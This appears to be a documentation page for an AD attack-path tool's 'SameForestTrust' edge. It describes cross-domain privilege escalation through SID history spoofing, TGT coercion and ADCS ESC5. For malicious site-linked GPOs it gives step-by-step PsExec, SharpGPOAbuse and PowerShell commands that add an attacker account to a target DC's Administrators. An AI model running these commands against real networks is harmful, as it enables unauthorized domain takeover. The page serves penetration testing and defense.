SameForestTrust

The SameForestTrust edge represents a trust relationship between two domains within the same AD forest. In this relationship, the source node domain has a same-forest (intra-realm) trust to the destination node domain, allowing principals (users and computers) from the destination domain to access resources in the source domain.

Because the domains are part of the same forest, they inherently trust each other, granting implicit control over resources across domains.

​

Abuse Info

An attacker with control over any domain within the forest can escalate their privileges to compromise other domains through multiple methods.

​

Spoof SID history

An attacker can spoof the SID history of a principal in the target domain, tricking the target domain into treating the attacker as a privileged user.

See the SpoofSIDHistory edge for more information.

This attack fails if SID filtering (quarantine) is enabled on the trust relationship in the opposite direction of the attack. The SID filtering blocks SIDs belonging to any other domain than the attacker-controlled domain. However, enabling this setting is rare and generally not recommended.

​

Coerce to TGT

An attacker can coerce a privileged computer (e.g., a DC) in the target domain to authenticate to an attacker-controlled computer configured with unconstrained delegation. This provides the attacker with a Kerberos TGT for the coerced computer.

See the CoerceToTGT edge for more information.

The attack fails if SID filtering (quarantine) is enabled, as this prevents TGTs from being sent across the trust boundary. Again, this setting is rarely configured.

​

ADCS ESC5

The Configuration Naming Context (NC) is a forest-wide partition writable by any DC within the forest. Most Active Directory Certificate Services (ADCS) configurations are stored in the Configuration NC. An attacker can abuse a DC to modify ADCS configurations to enable an ADCS domain escalation opportunity that compromises the entire forest.

Attack Steps:

1. Obtain a SYSTEM session on a DC in the attacker-controlled domain
2. Create a certificate template allowing ESC1 abuse
3. Publish the certificate template to an enterprise CA
4. Enroll the certificate as a privileged user in the target domain
5. Authenticate as the privileged user in the target domain using the certificate

See this blog post for further details: From DA to EA with ESC5.

If ADCS is not installed: An attacker can install ADCS and exploit it, as detailed in the blog post: Escalating from child domain’s admins to enterprise admins in 5 minutes by abusing AD CS, a follow up.

​

GPO linked on Site

AD sites are stored in the forest-wide Configuration NC partition, writable by any DC within the forest. An attacker with SYSTEM access to a DC can link a malicious GPO to the site of any DC in the forest.

Step 1: Obtain a SYSTEM session on a DC in the attacker-controlled domain
Use PsExec to start a PowerShell terminal as SYSTEM on the DC:

PsExec64.exe -s -i -accepteula powershell

Step 2: Create a GPO
Use the GroupPolicy module of RSAT to create the new GPO:

New-GPO -Name "MyGPO"

Step 3: Add the compromising setting to the GPO
Use SharpGPOAbuse to add a scheduled task:

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "MyTask" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup Administrators /Add DUMPSTER\tim" --GPOName "MyGPO"

Step 4: Identify a target DC and its site Use the ActiveDirectory module of RSAT to query for DCs in the target domain:

Get-ADDomainController -server bastion.local | select Name,Site

Look up the site DistinguishedName:

Get-ADReplicationSite Default-First-Site-Name | select DistinguishedName

Step 5: Set the GPO permissions

This step is important to avoid applying the GPO to all computers connected to the site. Use the GroupPolicy module of RSAT to modify the permissions such that Authenticated Users can read the object but only the targeted computer applies the GPO settings:

$GPO = Get-GPO -Name "MyGPO"

$GPO | Set-GPPermissions -PermissionLevel GpoRead -TargetName "Authenticated Users" -TargetType Group -Replace

$GPO | Set-GPPermissions -PermissionLevel GpoApply -TargetName "BASTION\\bldc01" -TargetType Computer

Step 6: Link the GPO to the site Use the GroupPolicy module of RSAT to link the GPO to the site:

New-GPLink -Name "MyGPO" -Target "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bastion,DC=local" -Server dc01.dumpster.fire

Note that you must specify the server to be the DC where you are running the command, as the command defaults to execute the change on a root domain DC where the compromised DC does not have the permissions to link the GPO.

Wait until replication has happened and the GPO has applied on the target DC, and log in with Administrators access on the compromised DC. Replication within the same site happens within 15 seconds but runs on 3 hour schedule by default across sites. GPOs are applied on a 90-120 min interval by default.

​

Opsec Considerations

There is no OPSEC associated with this edge.

​

References

This edge is related to the following MITRE ATT&CK tactic and techniques:

• T1134.005: Access Token Manipulation: SID-History Injection
• T1187: Forced Authentication
• T1649: Steal or Forge Authentication Certificates
• T1558: Steal or Forge Kerberos Tickets
• T1550.003: Use Alternate Authentication Material: Pass the Ticket
• T1484.001: Domain or Tenant Policy Modification: Group Policy Modification

Abuse info references:

• Microsoft AD Trust Technical Documentation
• From DA to EA with ESC5
• Escalating from child domain’s admins to enterprise admins in 5 minutes by abusing AD CS, a follow up
• SID filter as security boundary between domains? (Part 4)
• SharpGPOAbuse